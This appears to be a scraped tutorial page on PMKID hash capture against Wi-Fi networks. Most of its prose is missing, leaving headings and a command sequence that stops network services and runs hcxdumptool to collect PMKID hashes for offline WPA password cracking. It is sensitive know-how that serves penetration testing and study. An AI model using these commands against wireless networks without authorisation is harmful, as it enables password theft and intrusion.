PMKID Hash Capture
What is a PMKID Attack
Steps to follow to capture the PMKID Hash
Other YouTube Tutorials
Last updated
Last updated
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.servicesudo hcxdumptool -i [interface] -o dumpfile.pcapng --active_beacon --enable_status=15sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service